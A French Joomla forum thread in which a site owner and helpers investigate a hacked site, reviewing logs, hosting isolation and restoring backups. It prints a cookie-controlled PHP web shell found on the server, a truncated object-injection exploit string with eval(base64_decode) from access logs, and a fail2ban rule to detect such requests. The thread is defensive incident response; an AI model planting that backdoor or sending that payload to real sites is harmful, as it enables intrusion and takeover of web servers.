Site hacké

**cavo789** · 09/09/2016, 13h07

Re : Site hacké

Bonjour

Ce type de hack est souvent généré par la présence d'un code indésirable dans le fichier /includes/defines.php.

Le code que tu as indiqué est, en effet, un virus.

Jette aussi un coup d'oeil aux fihciers /index.php se trouvant dans tes dossiers templates.

Pour le "par où"; c'est une question rudement compliquée. Il faudrait avoir une idée de la date du hack et analyser les logs des accès Apache pour essayer de trouver une piste.

Si tu as un backup sain et récent, la solution la plus simple pour récupérer par soi-même son site est de restaurer l'archive.

Bonne journée.

**seabird** · 09/09/2016, 16h23

Re : Site hacké

Bonjour Christophe,

J'ai regardé un peu plus dans le détail.
Tout d'abord, le fichier /includes/defines.php est sain.
En fait , il m'a placé dans dans le dossier \librairies\cms\schema\ le 29/08. à 18H30
importmod.php
mainmedias.gif de 22 Mo
softwareicon.png
updowngraphic.png
webfooter.png

Si je regarde les logs à cette heure la je vois:
POST /components/com_akeeba/ujcaihb.php
"GET /components/com_akeeba/ujcaihb.php

Fichier qui contient:

Code:

<?php	
error_reporting(0);
class	ujoybv	{	
	public	function	__construct()	{		
		$jq	=	@$_COOKIE['exylwajbplhpdlvn3'];	
		if	($jq)	{	
			$option	=	$jq	(@$_COOKIE['exylwajbplhpdlvn2'])	;	
			$au	=	$jq	(	@$_COOKIE['exylwajbplhpdlvn1'])	;	
			$option	(	"/438/e"	,	$au	,	438	)	;	
		}	else	{	
			header("HTTP/1.0 404 Not Found");
		}	
	}	
}	
$content	=	new	ujoybv;

maintenant comment ce fichier est arrivé là , je ne sais pas. ( il date de 2015 en fait)

Eric

**cavo789** · 09/09/2016, 16h53

Re : Site hacké

La date peut être trafiquée mais oui, peut-être est-il là depuis longtemps

**manu93fr** · 09/09/2016, 16h55

Re : Site hacké

Tu peux deja regarder si dans ta sauvegarde saine, les fichiers sont présents ... et en conséquence, soit remonter une sauvegarde (le plus rapide) soit TOUT nettoyer du sol au plafond !!!

Question a 2€ : Tu as plusieurs site web sur le même espace FTP ?

**seabird** · 09/09/2016, 22h15

Re : Site hacké

Dommage je n'ai pas les logs du 04/05/2015, date d'implantation du fichier ujcaihb.php ( c'est trop loin).
En fait, si je me rémémore un peu tout.
Je me suis aperçu par hasard que j'avais été hacké en janvier 2016. Suite à cela j'avais fait le tour des fichiers, supprimé les fichiers douteux, fait les mises à jour et installé aesecure.

Mais je suis visiblement passé à côté de ce fichier ujcaihb.php qui ressort aujourd'hui, plus d'un an après.
( La date n'a pas été modifiée, car il est présent dans toutes mes différentes sauvegardes)
En espérant qu'encore une fois, j'e n'en ai pas oublié.

Envoyé par manu93fr Voir le message

Question a 2€ : Tu as plusieurs site web sur le même espace FTP ?

Oui, j'ai plusieurs sites sur les serveurs ( en espérant qu'ils soient correctement isolés les uns des autres)

Eric

**manu93fr** · 10/09/2016, 01h14

Re : Site hacké

Oui, j'ai plusieurs sites sur les serveurs ( en espérant qu'ils soient correctement isolés les uns des autres)

et bien s'ils sont sur le même FTP en mutualisé ... genre :

_ racine ftp
|__ www1 -> site 1
|__ www2 -> site 2
|__ www3 -> site 3

ça m'etonnerait

**seabird** · 10/09/2016, 11h51

Re : Site hacké

Oula non , je n'ai pas fait comme ça.
Chaque site a sont propre ftp limité à son www

**cavo789** · 10/09/2016, 13h51

Re : Site hacké

Bonjour

L'utilisateur FTP est une chose et les droits d'accès une autre.

Ce que Manu veut te faire prendre conscience c'est qu'un script PHP se trouvant dans \site1 pourrait très probablement aller créer des fichiers dans /site2 dès lors que le droit d'accès de l'utilisateur WWW est le même sur les deux sites; ce qui est généralement le cas sur les mutualisés.

Généralement veut dire que certains hébergeurs garantissent une isolation des sites entre eux alors même que le compte client est le même.

Si tu as des compétences en PHP, tu pourrais écrire un petit script PHP que tu placerais à la racine de ton site et qui ferait un print_r(glob('../*')); Je tape l'instruction vite fait, l'idée est de te montrer une instruction qui permet de lister le contenu d'un dossier. Ici ".." permet donc de remonter d'un niveau et donc, si tu vois les noms des dossiers site1, site2, ... c'est qu'il n'y a pas d'isolation. Un virus dans site1 pourrait alors attaquer site2 et vice-versa.

**seabird** · 10/09/2016, 15h26

Re : Site hacké

Oui mais sur mes sites , j'ai fait en sorte que cela ne soit pas l'utilisateur www-data qui execute les scripts mais l’utilisateur propriétaire des fichiers.
Sur mes serveurs debian7 , j'ai donc utilisé suexec et suphp

Par contre, sur mes serveurs debian8 , j'utilise php-fpm avec le système de pools et open_basedir. Car suphp n'est plus maintenu.
Maintenant, est ce que cela suffit...

Sinon , je suis en train encore de regarder mes logs et je vois ce type de requête ces jours ci.

Code:

"GET / HTTP/1.1" 200 5349 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3702:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvaW1hZ2VzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYl....

Je me demande s'il ne serait pas judicieux de créer un jail qui détecte base64_decode avec fail2ban , qui me bannera l'ip.
du style: failregex = ^<HOST> .*GET .*(base64_decode).*

Sinon j'ai comme tu me la proposé tapé print_r(glob('../*'));
C'est bon cela ne remonte pas, j'ai comme résultat: Array ( [0] => ../www )

Eric

**cavo789** · 10/09/2016, 15h54

Re : Site hacké

Très bien pour le glob.

Pour l'attaque c'est une attaque de décembre 2015 qui vise les Joomla non à jour et tournant sur un version de php non à jour également. Tu ne risques rien avec cette attaque si tes systèmes sont régulièrement mis à jour.

**seabird** · 10/09/2016, 16h26

Re : Site hacké

penses-tu qu'il serait judicieux de créer un jail qui détecte base64_decode dans les logs avec fail2ban , qui me bannera l'ip.
du style: failregex = ^<HOST> .*GET .*(base64_decode).*

Eric

**cavo789** · 10/09/2016, 16h31

Re : Site hacké

Je n'ai aucune pratique de fail2ban. Je ne saurais te conseiller quelque chose.

**seabird** · 10/09/2016, 16h36

Re : Site hacké

Ok, donc je viens de tester ce filtre. Il a l'air de fonctionner correctement, il me ban toutes les IP qui tente quelque-chose avec base64_decode.

Pour ceux que cela interresse et qui connaissent fail2ban:
dans le jail.local
[hacker-base64]
enabled = true
filter = hacker-base64
action = iptables[name=hacker-base64, port=http, protocol=tcp]
logpath = /var/log/apache*/*access.log
bantime = 86400
maxretry = 1

et créer un filtre hacker-base64.conf dans /filter.d
[Definition]
failregex = ^<HOST> .*GET .*(base64_decode).*
ignoreregex =

Eric

Site hacké

Site hacké

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Commentaire

Annonce

Partenaire de l'association